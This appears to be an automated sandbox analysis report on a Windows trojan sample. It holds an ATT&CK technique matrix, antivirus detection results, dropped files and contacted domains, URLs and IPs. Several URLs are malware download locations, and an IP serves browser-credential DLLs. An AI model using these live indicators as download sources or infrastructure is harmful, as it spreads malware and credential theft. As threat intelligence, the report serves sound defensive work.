Valid Accounts	Windows Management Instrumentation1	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools11	OS Credential Dumping1	System Time Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer14	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Application Shimming1	Application Shimming1	Deobfuscate/Decode Files or Information1	Input Capture1	Account Discovery1	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Encrypted Channel22	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution1	Logon Script (Windows)	Process Injection512	Obfuscated Files or Information3	Credentials in Registry1	File and Directory Discovery4	SMB/Windows Admin Shares	Screen Capture1	Automated Exfiltration	Non-Standard Port11	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing14	NTDS	System Information Discovery166	Distributed Component Object Model	Input Capture1	Scheduled Transfer	Non-Application Layer Protocol4	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Timestomp1	LSA Secrets	Security Software Discovery361	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol25	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	DLL Side-Loading1	Cached Domain Credentials	Virtualization/Sandbox Evasion141	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	File Deletion1	DCSync	Process Discovery13	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Masquerading21	Proc Filesystem	Application Window Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Virtualization/Sandbox Evasion141	/etc/passwd and /etc/shadow	System Owner/User Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Process Injection512	Network Sniffing	Remote System Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Hidden Files and Directories1	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
69CDTt1pad.exe	41%	Virustotal		Browse
69CDTt1pad.exe	43%	ReversingLabs	Win32.Trojan.Sabsik
69CDTt1pad.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\Temp\CA2F.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\D711.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\B483.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\tvvihsf	100%	Joe Sandbox ML
C:\ProgramData\freebl3.dll	0%	Metadefender	Browse
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	3%	Metadefender	Browse
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	Metadefender	Browse
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	Metadefender	Browse
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	Metadefender	Browse
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	Metadefender	Browse
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\softokn3[1].dll	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\mozglue[1].dll	3%	Metadefender	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\vcruntime140[1].dll	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\freebl3[1].dll	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\nss3[1].dll	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\nss3[1].dll	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
21.1.tvvihsf.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.1.69CDTt1pad.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.2.69CDTt1pad.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
27.1.B483.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
31.2.CA2F.exe.40b0e50.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
22.2.tvvihsf.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.1.69CDTt1pad.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
31.3.CA2F.exe.4150000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
22.1.tvvihsf.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://telete.in/s	0%	Avira URL Cloud	safe
https://telete.in/g	0%	Avira URL Cloud	safe
https://api.ip.sb/geoip	0%	URL Reputation	safe
https://api.ip.sbx	0%	Avira URL Cloud	safe
http://tempuri.org/	0%	Avira URL Cloud	safe
https://telete.in/	0%	URL Reputation	safe
http://secureteam.net/webservices/T	0%	Avira URL Cloud	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://188.34.200.103/vcruntime140.dll	0%	Avira URL Cloud	safe
http://188.34.200.103/msvcp140.dll	0%	Avira URL Cloud	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://tempuri.org/Endpoint/CheckConnectResponse	0%	Avira URL Cloud	safe
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	0%	URL Reputation	safe
http://cacerts.digicert.c	0%	Avira URL Cloud	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://secureteam.net/webservices/TU	0%	Avira URL Cloud	safe
http://secureteam.net/webservices/Y	0%	Avira URL Cloud	safe
https://dynamic.t	0%	URL Reputation	safe
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	0%	Avira URL Cloud	safe
http://188.34.200.103/softokn3.dll	0%	Avira URL Cloud	safe
http://188.34.200.103/824	0%	Avira URL Cloud	safe
http://188.34.200.103/	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://readinglistforaugust3.xyz/	100%	Avira URL Cloud	malware
http://www.typography.netD	0%	URL Reputation	safe
http://secureteam.net/ErrorReporting.asmx	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
https://telete.in/xylichanjk	0%	Avira URL Cloud	safe
http://188.34.200.103/nss3.dll	0%	Avira URL Cloud	safe
http://secureteam.net/webservices/CreateErrorReport	0%	Avira URL Cloud	safe
https://api.ip.sb	0%	URL Reputation	safe
http://readinglistforaugust3.xyz/reestr.exe	100%	Avira URL Cloud	malware
https://www.tiktok.com/legal/report/feedback	0%	URL Reputation	safe
http://readinglistforaugust3.xyz/raccon.exe	100%	Avira URL Cloud	malware
http://swretjhwrtj.gq/@Rarenut0.exe	0%	Avira URL Cloud	safe
http://swretjhwrtj.gqx	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://188.34.200.103/freebl3.dll	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://188.34.200.103/mozglue.dll	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
mxa-00262c01.gslb.pphosted.com	148.163.152.163	true	false	high
mxa-0063c401.gslb.pphosted.com	205.220.165.73	true	false	high
mx01.oxsus-vadesecure.net	51.81.57.58	true	false	high
z-p42-instagram.c10r.instagram.com	157.240.17.174	true	false	high
inmail.zdf.de	194.45.94.190	true	false	high
alt2.aspmx.l.google.com	74.125.200.27	true	false	high
defeatwax.ru	193.56.146.188	true	false	high
mxa-001e1201.gslb.pphosted.com	67.231.144.223	true	false	high
mxa-00155702.gslb.pphosted.com	205.220.172.150	true	false	high
eduarroma.tumblr.com	74.114.154.22	true	false	high
mxb-00010702.gslb.pphosted.com	148.163.158.57	true	false	high
www.google.com	216.58.215.228	true	false	high
fastpool.xyz	213.91.128.133	true	false	high
smtp-mx10d4.mixmail.com.mx	169.47.40.43	true	false	high
mx08-00031601.pphosted.com	185.132.182.217	true	false	high
mxa-005be101.gslb.pphosted.com	205.220.165.221	true	false	high
mxa-005dfb01.gslb.pphosted.com	205.220.166.153	true	false	high
readinglistforaugust3.xyz	212.224.105.79	true	false	high
mxa-002c2d01.gslb.pphosted.com	148.163.151.61	true	false	high
mxb-002b4301.gslb.pphosted.com	148.163.150.232	true	false	high
mxa-0017bf01.gslb.pphosted.com	67.231.157.174	true	false	high
mx.m33access.com	65.111.222.15	true	false	high
mxa-000e8d01.gslb.pphosted.com	148.163.147.191	true	false	high
readinglistforaugust2.xyz	95.213.224.6	true	false	high
mxb-00247301.gslb.pphosted.com	148.163.149.100	true	false	high
mxa-00234e01.gslb.pphosted.com	148.163.158.101	true	false	high
mxb-003d1301.gslb.pphosted.com	67.231.151.221	true	false	high
mxa-0007b301.gslb.pphosted.com	67.231.152.34	true	false	high
am2mxi05.aig.com	167.230.144.44	true	false	high
msa-smtp-mx1.hinet.net	168.95.6.54	true	false	high
mxa-00515601.gslb.pphosted.com	148.163.135.73	true	false	high
mx.vgs.untd.com	64.136.52.37	true	false	high
www2.l.google.com	172.217.168.4	true	false	high
work.a-poster.info	37.1.217.172	true	false	high
mxa-0005f101.gslb.pphosted.com	208.84.65.44	true	false	high
m.youtube.com	216.58.215.238	true	false	high
telete.in	195.201.225.248	true	false	high
mxb-0023c001.gslb.pphosted.com	148.163.149.1	true	false	high
mxb-00004003.gslb.pphosted.com	205.220.165.101	true	false	high
mxa-000c9b01.gslb.pphosted.com	205.220.178.177	true	false	high
mxb-002a1b02.gslb.pphosted.com	148.163.144.5	true	false	high
mx.lycos.com.cust.b.hostedemail.com	64.98.36.4	true	false	high
eur.olc.protection.outlook.com	104.47.18.161	true	false	high
smtpmail6.crbard.com	206.19.235.149	true	false	high
alt1.aspmx.l.google.com	142.250.150.26	true	false	high
swretjhwrtj.gq	172.67.216.236	true	false	high
mx0.charter.net	47.43.18.9	true	false	high
mxa-00069f01.gslb.pphosted.com	205.220.165.26	true	false	high
mx1.free.fr	212.27.48.7	true	false	high
mx-aol.mail.gm0.yahoodns.net	67.195.204.80	true	false	high
am1mxi02.aig.com	167.230.100.41	true	false	high
mxa-001ec801.gslb.pphosted.com	148.163.140.146	true	false	high
mxa-00246402.gslb.pphosted.com	148.163.147.197	true	false	high
mta6.am0.yahoodns.net	67.195.228.106	true	false	high
live-com.olc.protection.outlook.com	104.47.73.161	true	false	high
mx20.mailspamprotection.com	35.192.5.156	true	false	high
ASPMX.L.GOOGLE.COM	173.194.69.26	true	false	high
outlook-com.olc.protection.outlook.com	104.47.14.33	true	false	high
smtp.almaya.ae	151.253.14.172	true	false	high
mx0a-00191d01.pphosted.com	67.231.149.140	true	false	high
mxb-00000d03.gslb.pphosted.com	148.163.153.234	true	false	high
mxb-0007b301.gslb.pphosted.com	67.231.152.34	true	false	high
napasmss-1.edwardjones.com	167.80.136.76	true	false	high
inbound.ucsd.edu	148.163.141.31	true	false	high
msn-com.olc.protection.outlook.com	104.47.14.33	true	false	high
mxb-00270301.gslb.pphosted.com	208.84.65.239	true	false	high
hotmail-com.olc.protection.outlook.com	104.47.74.33	true	false	high
aspmx.l.google.com	173.194.69.26	true	false	high
fairview.org	unknown	unknown	false	high
hotmail.com	unknown	unknown	false	high
live.co.uk	unknown	unknown	false	high
stanford.edu	unknown	unknown	false	high
live.com	unknown	unknown	false	high
hotmail.ca	unknown	unknown	false	high
bellsouth.com	unknown	unknown	false	high
beta.tricity.wsu.edu	unknown	unknown	false	high
tps.org	unknown	unknown	false	high
mfgservs.com	unknown	unknown	false	high
my.gcu.edu	unknown	unknown	false	high
nu.edu	unknown	unknown	false	high
readinglistforaugust1.xyz	unknown	unknown	false	high
hotmail.de	unknown	unknown	false	high
slu.edu	unknown	unknown	false	high
aol.com	unknown	unknown	false	high
lycos.com	unknown	unknown	false	high
hotmail.es	unknown	unknown	false	high
yahoo.com.au	unknown	unknown	false	high
harding.edu	unknown	unknown	false	high
unk.edu	unknown	unknown	false	high
trivett.com.au	unknown	unknown	false	high
77.52.17.84.in-addr.arpa	unknown	unknown	false	high
crbard.com	unknown	unknown	false	high
ni.com	unknown	unknown	false	high
kennametal.com	unknown	unknown	false	high
ucsd.edu	unknown	unknown	false	high
hotmail.fr	unknown	unknown	false	high
peoplepc.com	unknown	unknown	false	high
almayagroup.com	unknown	unknown	false	high
spectrum-health.org	unknown	unknown	false	high
msn.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://188.34.200.103/vcruntime140.dll	false	Avira URL Cloud: safe	unknown
http://188.34.200.103/msvcp140.dll	false	Avira URL Cloud: safe	unknown
http://188.34.200.103/softokn3.dll	false	Avira URL Cloud: safe	unknown
http://188.34.200.103/824	false	Avira URL Cloud: safe	unknown
http://188.34.200.103/	false	Avira URL Cloud: safe	unknown
http://readinglistforaugust3.xyz/	true	Avira URL Cloud: malware	unknown
http://188.34.200.103/nss3.dll	false	Avira URL Cloud: safe	unknown
http://readinglistforaugust3.xyz/reestr.exe	true	Avira URL Cloud: malware	unknown
http://readinglistforaugust3.xyz/raccon.exe	true	Avira URL Cloud: malware	unknown
http://swretjhwrtj.gq/@Rarenut0.exe	false	Avira URL Cloud: safe	unknown
http://188.34.200.103/freebl3.dll	false	Avira URL Cloud: safe	unknown
http://188.34.200.103/mozglue.dll	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://telete.in/s	B483.exe, 0000001B.00000002.517044873.0000000002DDD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.ditu.live.com/REST/v1/Routes/	svchost.exe, 0000000D.00000002.314440855.000002BED9A3C000.00000004.00000001.sdmp	false		high
https://corp.roblox.com/contact/	svchost.exe, 00000013.00000003.363538844.0000020C47B7A000.00000004.00000001.sdmp	false		high
https://t0.tiles.ditu.live.com/tiles/gen	svchost.exe, 0000000D.00000002.314485514.000002BED9A4D000.00000004.00000001.sdmp	false		high
https://telete.in/g	B483.exe, 0000001B.00000002.517044873.0000000002DDD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ip.sb/geoip	C481.exe, 0000001C.00000002.527630873.0000000003164000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://api.ip.sbx	C481.exe, 0000001C.00000002.527630873.0000000003164000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/Walking	svchost.exe, 0000000D.00000003.311777509.000002BED9A60000.00000004.00000001.sdmp	false		high
http://tempuri.org/	C481.exe, 0000001C.00000002.527574653.0000000003158000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	false		high
https://telete.in/	B483.exe, 0000001B.00000002.517044873.0000000002DDD000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://secureteam.net/webservices/T	C481.exe, 0000001C.00000000.401898853.0000000000C52000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/	svchost.exe, 0000000D.00000003.311848561.000002BED9A5A000.00000004.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/v1/Transit/Schedules/	svchost.exe, 0000000D.00000002.314459845.000002BED9A42000.00000004.00000001.sdmp	false		high
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
https://appexmapsappupdate.blob.core.windows.net	svchost.exe, 0000000D.00000003.311777509.000002BED9A60000.00000004.00000001.sdmp	false		high
https://en.help.roblox.com/hc/en-us	svchost.exe, 00000013.00000003.363538844.0000020C47B7A000.00000004.00000001.sdmp	false		high
http://www.urwpp.deDPlease	explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.bingmapsportal.com	svchost.exe, 0000000D.00000002.314293390.000002BED9A13000.00000004.00000001.sdmp	false		high
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000005.00000000.278191049.0000000006870000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=	svchost.exe, 0000000D.00000003.313470239.000002BED9A56000.00000004.00000001.sdmp	false		high
http://tempuri.org/Endpoint/CheckConnectResponse	C481.exe, 0000001C.00000002.527574653.0000000003158000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/	svchost.exe, 0000000D.00000002.314440855.000002BED9A3C000.00000004.00000001.sdmp	false		high
https://www.roblox.com/develop	svchost.exe, 00000013.00000003.363538844.0000020C47B7A000.00000004.00000001.sdmp	false		high
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	C481.exe, 0000001C.00000002.543587785.0000000012FB8000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://cacerts.digicert.c	svchost.exe, 00000013.00000002.376076543.0000020C47213000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://corp.roblox.com/parents/	svchost.exe, 00000013.00000003.363538844.0000020C47B7A000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=	svchost.exe, 0000000D.00000002.314293390.000002BED9A13000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000002.314440855.000002BED9A3C000.00000004.00000001.sdmp	false		high
https://%s.xboxlive.com	svchost.exe, 0000000A.00000002.512476728.00000281D543E000.00000004.00000001.sdmp	false	URL Reputation: safe	low
https://dev.virtualearth.net/REST/v1/Locations	svchost.exe, 0000000D.00000003.311777509.000002BED9A60000.00000004.00000001.sdmp	false		high
https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 0000000D.00000003.289909839.000002BED9A31000.00000004.00000001.sdmp	false		high
http://www.carterandcone.coml	explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://secureteam.net/webservices/TU	C481.exe, 0000001C.00000000.401898853.0000000000C52000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://secureteam.net/webservices/Y	C481.exe, 0000001C.00000000.401898853.0000000000C52000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	svchost.exe, 00000006.00000002.530157711.000001F8D75A0000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/frere-jones.html	explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	false		high
https://dynamic.t	svchost.exe, 0000000D.00000002.314546935.000002BED9A64000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit	svchost.exe, 0000000D.00000003.311777509.000002BED9A60000.00000004.00000001.sdmp	false		high
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	C481.exe, 0000001C.00000002.527605246.0000000003160000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=	svchost.exe, 0000000D.00000002.314520525.000002BED9A5D000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=	svchost.exe, 0000000D.00000003.311848561.000002BED9A5A000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/Driving	svchost.exe, 0000000D.00000003.311777509.000002BED9A60000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx	svchost.exe, 0000000D.00000002.314440855.000002BED9A3C000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers?	explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2006/02/addressingidentity	C481.exe, 0000001C.00000002.527464159.0000000003142000.00000004.00000001.sdmp	false		high
http://www.tiro.com	explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.goodfont.co.kr	explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=	svchost.exe, 0000000D.00000002.314459845.000002BED9A42000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/mapcontrol/logging.ashx	svchost.exe, 0000000D.00000003.311777509.000002BED9A60000.00000004.00000001.sdmp	false		high
http://www.typography.netD	explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=	svchost.exe, 0000000D.00000003.289909839.000002BED9A31000.00000004.00000001.sdmp	false		high
http://secureteam.net/ErrorReporting.asmx	C481.exe	false	Avira URL Cloud: safe	unknown
http://www.g5e.com/G5_End_User_License_Supplemental_Terms	svchost.exe, 00000013.00000003.352002441.0000020C47BA5000.00000004.00000001.sdmp	false		high
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fonts.com	explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.sakkal.com	explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
https://telete.in/xylichanjk	B483.exe, 0000001B.00000002.517168204.0000000002DE6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/	svchost.exe, 0000000D.00000002.314440855.000002BED9A3C000.00000004.00000001.sdmp	false		high
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx	svchost.exe, 0000000D.00000003.311777509.000002BED9A60000.00000004.00000001.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	false		high
https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure	svchost.exe, 00000013.00000003.352002441.0000020C47BA5000.00000004.00000001.sdmp	false		high
http://secureteam.net/webservices/CreateErrorReport	C481.exe, 0000001C.00000000.401898853.0000000000C52000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ip.sb	C481.exe, 0000001C.00000002.527630873.0000000003164000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=	svchost.exe, 0000000D.00000003.313470239.000002BED9A56000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?	svchost.exe, 0000000D.00000002.314520525.000002BED9A5D000.00000004.00000001.sdmp	false		high
https://www.tiktok.com/legal/report/feedback	svchost.exe, 00000013.00000003.354398985.0000020C47B74000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 0000000D.00000002.314485514.000002BED9A4D000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/mapcontrol/logging.ashx	svchost.exe, 0000000D.00000003.311777509.000002BED9A60000.00000004.00000001.sdmp	false		high
http://swretjhwrtj.gqx	C481.exe, 0000001C.00000002.524470286.0000000002FF4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=	svchost.exe, 0000000D.00000002.314520525.000002BED9A5D000.00000004.00000001.sdmp	false		high
http://www.founder.com.cn/cn	explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/	explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen	svchost.exe, 0000000D.00000002.314431106.000002BED9A3A000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers8	explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	false		high
https://www.roblox.com/info/privacy	svchost.exe, 00000013.00000003.363538844.0000020C47B7A000.00000004.00000001.sdmp	false		high
http://www.g5e.com/termsofservice	svchost.exe, 00000013.00000003.352002441.0000020C47BA5000.00000004.00000001.sdmp	false		high
https://activity.windows.com	svchost.exe, 0000000A.00000002.512476728.00000281D543E000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Locations	svchost.exe, 0000000D.00000003.311777509.000002BED9A60000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
188.34.200.103	unknown	Germany	24940	HETZNER-ASDE	false
185.49.70.90	unknown	United Kingdom	28753	LEASEWEB-DE-FRA-10DE	false
74.114.154.22	eduarroma.tumblr.com	Canada	2635	AUTOMATTICUS	false
212.224.105.79	readinglistforaugust3.xyz	Germany	44066	DE-FIRSTCOLOwwwfirst-colonetDE	false
95.213.224.6	readinglistforaugust2.xyz	Russian Federation	49505	SELECTELRU	false
